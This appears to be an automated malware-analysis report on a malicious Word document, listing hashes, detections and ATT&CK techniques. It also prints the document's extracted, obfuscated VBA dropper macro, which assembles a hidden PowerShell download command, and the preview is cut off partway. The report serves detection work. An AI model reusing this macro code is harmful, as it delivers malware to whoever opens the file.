Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c46d2b76075cbc85…

MALICIOUS

Office (OLE)

Size: 239.8 KB
Created: 2018-06-26 22:17:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: fd20cb9441d81e95d7a6f77a422b039f
SHA-1: eb80c6a234e600f355e9c45fe28784dff89d8156
SHA-256: c46d2b76075cbc85d50fbb7ce64e1ea4f5c7064de7ffafdf0166db2d6996ccd3
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV and exhibits critical heuristic firings for VBA macros, including a Shell() call and auto-execution markers like AutoOpen. The VBA script contains obfuscated string concatenation that, when reconstructed, forms a command likely intended to download and execute a second-stage payload. The presence of the AutoOpen macro and the Shell() call strongly suggests an attempt to immediately run malicious code upon opening the document.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6592487-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592487-0
  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10241 bytes
SHA-256: 0c4d46e6973944000a016eaed4de74742b277bfea69540a6b20d3fd2a7c056e6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "rENtLwUffomkmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DzczGFIYwBIp"
Function qddRhNOq()
On Error Resume Next
UAUcoF = 3950
zzIVCJ = CDate(97454)
ZFwkr = vZdjE
VBusZ = 48704
MiHCwc = 96555
VwMio = Sin(54794)
KOFuBdFYP = "Hell " + " " + Chr(34) + "$" + Chr(40) + " set" + "-VariAB" + "Le  'OfS" + "' '' " + Chr(41) + " " + Chr(34)
rktsd = 74229
hShwib = CDate(77231)
RfLHfv = LFLRI
ubaoX = 29679
aQBQCi = 66781
JzjvW = Sin(52953)
KDjHl = Chr(43) + "[sT" + "riN" + "G]" + Chr(40) + " " + Chr(40) + "107,3" + "7 ,32,59" + ", " + "114,3" + "3 , " + "42,56 , "
KkBYi = 51726
qBSqJ = CDate(55018)
dquDlX = lSIjO
iiFAHU = 83432
GiWlw = 87612
qnzkj = Sin(50349)
jDasLktbBub = "98 , 32" + " , 45 , " + "37" + " , 4" + "2, 44" + ", 59" + ",1" + "11 , 1, " + "42,59," + " 97 ,24"
OoCNmw = 61106
azrZc = CDate(11348)
PZlrA = kuwRjo
TIjGB = 38474
iIvibj = 77582
wuhuk = Sin(54694)
IrGjj = ",42 ,45 " + ", 12 ," + "35,38" + ", 42 , 3" + "3 ,59,1" + "16,107 "
VYdom = 69958
htjbJ = CDate(95402)
GiKNrs = QBkzaT
mBHiNz = 68676
CjlDSG = 67202
SOjls = Sin(22180)
KRKbGihGFWw = ",37, 6" + "1 ," + "38, 114 " + ", " + "104 ," + " 39 ,5" + "9 " + ", 59,63" + " ,117 " + ", " + "96 " + ", "
aCmLT = 79342
FpiPNb = CDate(70001)
lUiwJv = GIfzj
JiiZw = 61587
SkqhDq = 25093
EvCduO = Sin(63013)
nNjRk = "96 , 56," + "56 , 56" + " ,97, 3" + "4," + "42,61, " + "46, 58 " + ",60 ," + "59" + " , 4" + "6,4"
qddRhNOq = KOFuBdFYP + KDjHl + jDasLktbBub + IrGjj + KRKbGihGFWw + nNjRk
ccCoq = 22760
zwrls = Sin(80611)
cVmhl = 80527
ASZFJF = CDate(35590)
rUazcZ = 58622
Iccob = zWKPhB
End Function
Function XVwOHDupA()
On Error Resume Next
AfZXb = 14311
aTCCCt = Sin(13949)
OXwIX = 66366
pkRbGz = CDate(79786)
UHjjf = 48457
UCAaNn = cLCGw
jtJhkdOu = "6 ," + " 43" + " , 97, 4" + "4, 32 " + ", " + "34" + " ,96," + "25,25" + ",8,61 ," + "96 ," + "15, " + "39"
DCHsJ = 55035
iYjnzk = Sin(72140)
JzEES = 73893
JGlOT = CDate(33006)
LqvcVi = 87982
RztmVN = Tvoqb
FLIBD = " , " + "59 , 59 " + ", 63,1" + "17 " + ", 96" + ",9" + "6, 45, " + "32 ," + "35 , 4" + "3,45" + ",38" + " ,"
nQYjE = 6324
zwoaj = Sin(41707)
XICdYX = 94131
RDNLw = CDate(84543)
zjXOuU = 16197
CaWuXa = RRqTr
OqapSvT = " 53, 97 " + ", 33, 42" + ", 59, 96" + " ,3 ,30," + " 127 , 5" + ",23, 59" + ",96," + " 15,39 " + ", 59" + ",59," + "63, 117," + "96, 96,"
uvbbzi = 26375
SUdwCq = Sin(14829)
iRIBCl = 49158
dQMSY = CDate(71142)
MwCIm = 54864
HhGDEt = fcGvFU
GzZiHOOifw = "38" + ",34,43 ," + " 46 , " + "57" + ",38," + "43"
DmUCQ = 19606
QnkLcz = Sin(44528)
JlRHSC = 43810
VjtnL = CDate(55873)
fkpTBa = 15080
zccVw = IAwHW
cfuIvvtlH = ",35 " + ", 42 , " + "42, 97" + " , 44,32" + " ,34," + "96 , 61 " + ", 44," + "53 ,2" + " ,55 " + ",96," + "15 "
FvfbT = 71571
WwoJl = Sin(72490)
WKQJO = 32360
RQMKNM = CDate(25304)
lIjlCQ = 68461
CAtMnM = JTWMNj
kJDql = ", " + "39 ,59" + ", 59,63 " + ",117 ,96" + ", 96 ,56" + " , 56 " + ",56"
XVwOHDupA = jtJhkdOu + FLIBD + OqapSvT + GzZiHOOifw + cfuIvvtlH + kJDql
awtLi = 70525
mJEAn = Sin(13240)
XYDwWm = 86495
jprUsH = CDate(78921)
zECYY = 71143
REUtQ = KakwDl
End Function
Function adCopiW()
On Error Resume Next
NKbPzB = 91060
zIlHrO = Sin(31046)
rCwqqo = 26862
vrNiX = CDate(42107)
CulLV = 81311
owrPUA = VsGAo
NwbrHzJX = ",9" + "7 , 45" + ", 61 ," + " 4" + "6,44 , 4" + "2,60,9" + "7 ,32," + "61, 40 " + ",97 ,58," + "36,96 ," + " 5" + "6,126"
lGBAWH = 56246
iKVUl = Sin(38688)
jVtwM = 52744
cuKbdC = CDate(79190)
CzdGql = 49189
INhnm = GEwKY
rGwrrh = " , 9," + "63, 12 " + ", 54,23 " + ",96 ,1" + "5," + "39 ," + "59 ," + "59" + ",63," + "117 , 96" + " ,96"
OYwwsQ = 26368
njsQFi = Sin(48582)
cqnDzs = 97735
tKznSZ = CDate(31320)
lwwNLO = 65494
nuIaZ = HrBNtb
nuiMsh = " , 56" + " , 5" + "6 , 56, " + "97,46" + ", 57" + " , 38, " + "60" + ",
... (truncated)